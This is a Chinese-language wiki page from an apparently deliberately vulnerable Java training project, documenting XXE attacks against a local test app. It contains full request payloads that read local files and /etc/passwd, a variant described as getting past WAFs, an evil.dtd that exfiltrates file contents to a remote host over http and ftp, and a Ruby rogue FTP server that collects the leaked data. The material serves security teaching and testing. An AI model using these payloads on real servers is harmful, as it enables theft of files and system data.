| CARVIEW |
Select Language
HTTP/2 200
date: Thu, 31 Jul 2025 00:03:09 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, X-Requested-With,Accept-Encoding, Accept, X-Requested-With
etag: W/"625056f961205029fa8cec8d1fe7ee2c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com wss://alive-staging.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com release-assets.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com copilotprodattachments.blob.core.windows.net/github-production-copilot-attachments/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
server: github.com
content-encoding: gzip
accept-ranges: bytes
set-cookie: _gh_sess=ysa0xV9b%2B4Z5zansZD7F0OKuNYskx3tO%2Ft36ZgNtAi5hTfJOJfsO8uFGxdJ76LNNop5kT7BQbfVUf8QOGNCBcSv%2BcZjrNpDQYhtOUn0lMBpN%2BJXccNKjxlhdHnlbwnwZrURwt6aYySNjq0Gvd44J7HhR1eqKqYCwueebqpCxXjOpcfsuzVilMqZ9IfHZ%2Fky7qlVaoXOoQ%2BA%2FxJCohymRrP1E29KLGytl87w7V%2FLZIjGt1UQ2F1SNQDf8TzBzmfl0kqDo522w1EGX4CJB52pYSg%3D%3D--GU620BNMHcH1Uhba--%2BGsHmvwegXQW%2B2t8Kg72YA%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.97485406.1753920188; Path=/; Domain=github.com; Expires=Fri, 31 Jul 2026 00:03:08 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Fri, 31 Jul 2026 00:03:08 GMT; HttpOnly; Secure; SameSite=Lax
x-github-request-id: A972:184B44:DBDB3:14BDF4:688AB2BC
XXE · JoyChou93/java-sec-code Wiki · GitHub
Skip to content
Navigation Menu
{{ message }}
-
Notifications
You must be signed in to change notification settings - Fork 697
XXE
JoyChou edited this page Feb 7, 2023
·
4 revisions
正常解析XML:
POST /xxe/DocumentBuilder HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 170
<?xml version="1.0" encoding="UTF-8"?>
<book id="1">
<name>Good Job</name>
<author>JoyChou</author>
<year>2017</year>
<price>100.00</price>
</book>
返回
name: Good Job
author: JoyChou
year: 2017
price: 100.00
利用file协议读取文件:
POST /xxe/DocumentBuilder_return HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 133
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE joychou [
<!ENTITY xxe SYSTEM "file:///tmp/1.txt">
]>
<root>&xxe;</root>
返回
#text: 1111
~!@#%^%'">
2222
➜ cat 1.txt
1111
~!@#%^%'">
2222在 XML 元素中,"<" 和 "&" 是非法的。"<" 会产生错误,因为解析器会把该字符解释为新元素的开始。"&" 也会产生错误,因为解析器会把该字符解释为字符实体的开始。
可以将脚本代码定义为 CDATA。CDATA 部分中的所有内容都会被解析器忽略。CDATA 部分由 "" 结束。具体利用方式可以查看https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/ 文章。但我在测试用CDATA,并没有读取<&成功。Payload如下:
-------------------------------------------------------------
post data:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///tmp/1.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "https://test.joychou.org/cdata.dtd">
%dtd;
]>
<root>&all;</root>
cdata.dtd:
<!ENTITY all "%start;%stuff;%end;">
-------------------------------------------------------------
post data:
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "https://test.joychou.org/cdata.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>
cdata.dtd:
<!ENTITY % file SYSTEM "file:///tmp/1.xt">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
-------------------------------------------------------------
在这份XXE漏洞代码中,需要设置Content-Type为application/xml,服务端才能获取到body内容。
POST /xxe/DocumentBuilder HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 79
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "https://test.joychou.org/evil.dtd">
payloads:
- 没有ENTITY关键字,可以用来Bypass WAF
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "https://test.joychou.org/evil.dtd">- 有ENTITY关键字,可能会被WAF拦截
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "https://test.joychou.org/evil.dtd">%remote;]>
<root/>evil.dtd代码:
http协议:
<!ENTITY % data SYSTEM "file:///tmp/x">
<!ENTITY % payload "<!ENTITY % send SYSTEM 'https://test.joychou.org/?data=%data;'>">
%payload;
%send;ftp协议:
<!ENTITY % data SYSTEM "file:///etc/redhat-release">
<!ENTITY % payload "<!ENTITY % send SYSTEM 'ftp://fakeuser:fakepass@test.joychou.org:2121/%data;'>">
%payload;
%send;或者将%payload;放在ftp的username或者password处。如果ftp不跟用户名或者密码ftp://test.joychou.org:2121/%payload;,利用FTP协议会接收到Java的版本。
New client connected
< USER anonymous
< PASS Java1.8.0_121@
< TYPE I
< EPSV ALL
< EPSV
< EPRT |1|172.17.29.150|60731|
< RETR test
< xxe
< ftp
FTP Server代码:
require 'socket'
server = TCPServer.new 2121
loop do
Thread.start(server.accept) do |client|
puts "New client connected"
data = ""
client.puts("220 xxe-ftp-server")
loop {
req = client.gets()
puts "< "+req
if req.include? "USER"
client.puts("331 password please - version check")
else
#puts "> 230 more data please!"
client.puts("230 more data please!")
end
}
end
end测试的结果(Centos):
| Java版本 | 是否能读换行 | 被截断的字符 | 其他报错的字符(什么都不能读) | 被替换成换行的字符 |
|---|---|---|---|---|
| 1.7.0_80 | 是 | # ? | % & ' | / |
| 1.8.0_121 | 是 | # ? | % & ' | / |
| 1.8.0_181 | 否 | # ? | % & ' | / |
可能还有其他的字符和其他的Java版本没有测试。不过我猜测,自从Java 1.8的某个版本起,就不能读取换行。至于是那个版本开始,就不具体测试了,大家知道这个特性就好 -)
2018年08月22日更新支持XInclude的XXE漏洞代码,详情见代码。
POC
<?xml version="1.0" ?>
<root xmlns:xi="https://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</root>详情可以查看浅析xml之xinclude & xslt
Clone this wiki locally
You can’t perform that action at this time.